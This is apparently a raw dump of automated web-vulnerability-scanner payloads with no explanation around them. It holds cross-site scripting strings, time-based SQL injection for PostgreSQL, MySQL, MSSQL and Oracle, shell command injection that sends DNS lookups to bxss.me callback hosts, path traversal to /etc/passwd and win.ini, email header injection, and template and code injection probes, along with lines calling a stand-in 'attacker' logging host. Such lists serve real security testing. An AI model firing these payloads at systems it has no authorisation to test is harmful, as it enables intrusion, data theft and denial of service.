http://attacker-9170/log.php?
}body{acu:Expre/**/SSion(dirk(9433))}
\u003CScRiPt\dirk(9188)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%64%69%72%6B%289067%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9195/log.php?
}body{acu:Expre/**/SSion(BEtU(9053))}
\u003CScRiPt\BEtU(9288)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%42%45%74%55%289169%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9949/log.php?
}body{acu:Expre/**/SSion(2hEa(9698))}
\u003CScRiPt\2hEa(9730)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%32%68%45%61%289866%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9830/log.php?
}body{acu:Expre/**/SSion(XHdV(9491))}
\u003CScRiPt\XHdV(9576)\u003C/sCripT\u003E
http://attacker-9295/log.php?
%0A%3C%53%63%52%69%50%74%20%3E%58%48%64%56%289052%29%3C%2F%73%43%72%69%70%54%3E
}body{acu:Expre/**/SSion(urMq(9676))}
\u003CScRiPt\urMq(9800)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%75%72%4D%71%289957%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
''||(select 1 from (select pg_sleep(15))x)||''
'||(select 1 from (select pg_sleep(15))x)||'
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
cFYynTtf')) OR 136=(SELECT 136 FROM PG_SLEEP(15))--
KVRrMrDH') OR 944=(SELECT 944 FROM PG_SLEEP(15))--
i3uHsur5' OR 937=(SELECT 937 FROM PG_SLEEP(15))--
-1)) OR 71=(SELECT 71 FROM PG_SLEEP(15))--
-5) OR 399=(SELECT 399 FROM PG_SLEEP(15))--
-5 OR 22=(SELECT 22 FROM PG_SLEEP(15))--
1 waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(sele...
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1 OR 3+251-251-1=0+0+0+1
-1 OR 2+251-251-1=0+0+0+1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'+'A'.concat(70-3).concat(22*4).concat(112).concat(66).concat(116).concat(72)+(require'socket'
So...
"+"A".concat(70-3).concat(22*4).concat(117).concat(77).concat(110).concat(77)+(require"socket"
So...
HttP://bxss.me/t/xss.html?%00
".gethostbyname(lc("hithx"."rgswlhpbae3c2.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(81)...
ctime
sleep
p0
(I30
tp1
Rp2
.
'.gethostbyname(lc('hityi'.'cryiiubk2c710.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(68)...
http://bxss.me/t/fit.txt?.jpg
1some_inexistent_file_with_long_name
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
`(nslookup hititfhppjicy678eb.bxss.me||perl -e "gethostbyname('hititfhppjicy678eb.bxss.me')")`
|(nslookup hitiwtesiisjb102a3.bxss.me||perl -e "gethostbyname('hitiwtesiisjb102a3.bxss.me')")
&(nslookup hitionffvczpz9b808.bxss.me||perl -e "gethostbyname('hitionffvczpz9b808.bxss.me')")&'\"...
$(nslookup hitcfrzazlpgn51a8a.bxss.me||perl -e "gethostbyname('hitcfrzazlpgn51a8a.bxss.me')")
(nslookup hitngoafylmxh1e8f2.bxss.me||perl -e "gethostbyname('hitngoafylmxh1e8f2.bxss.me')")
|echo mjrsdx$()\ pykdpn\nz^xyu||a #' |echo mjrsdx$()\ pykdpn\nz^xyu||a #|" |echo mjrsdx$()\ pykdp...
&echo cadqtb$()\ ecgspl\nz^xyu||a #' &echo cadqtb$()\ ecgspl\nz^xyu||a #|" &echo cadqtb$()\ ecgsp...
echo juqseh$()\ gvhaqr\nz^xyu||a #' &echo juqseh$()\ gvhaqr\nz^xyu||a #|" &echo juqseh$()\ gvhaqr...
to@example.com>
bcc:074625.19373-150183.19373.65f55.19130.2@bxss.me
bcc:074625.19373-150182.19373.65f55.19130.2@bxss.me
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../etc/passwd
"+response.write(9336162*9002758)+"
'+response.write(9336162*9002758)+'
response.write(9336162*9002758)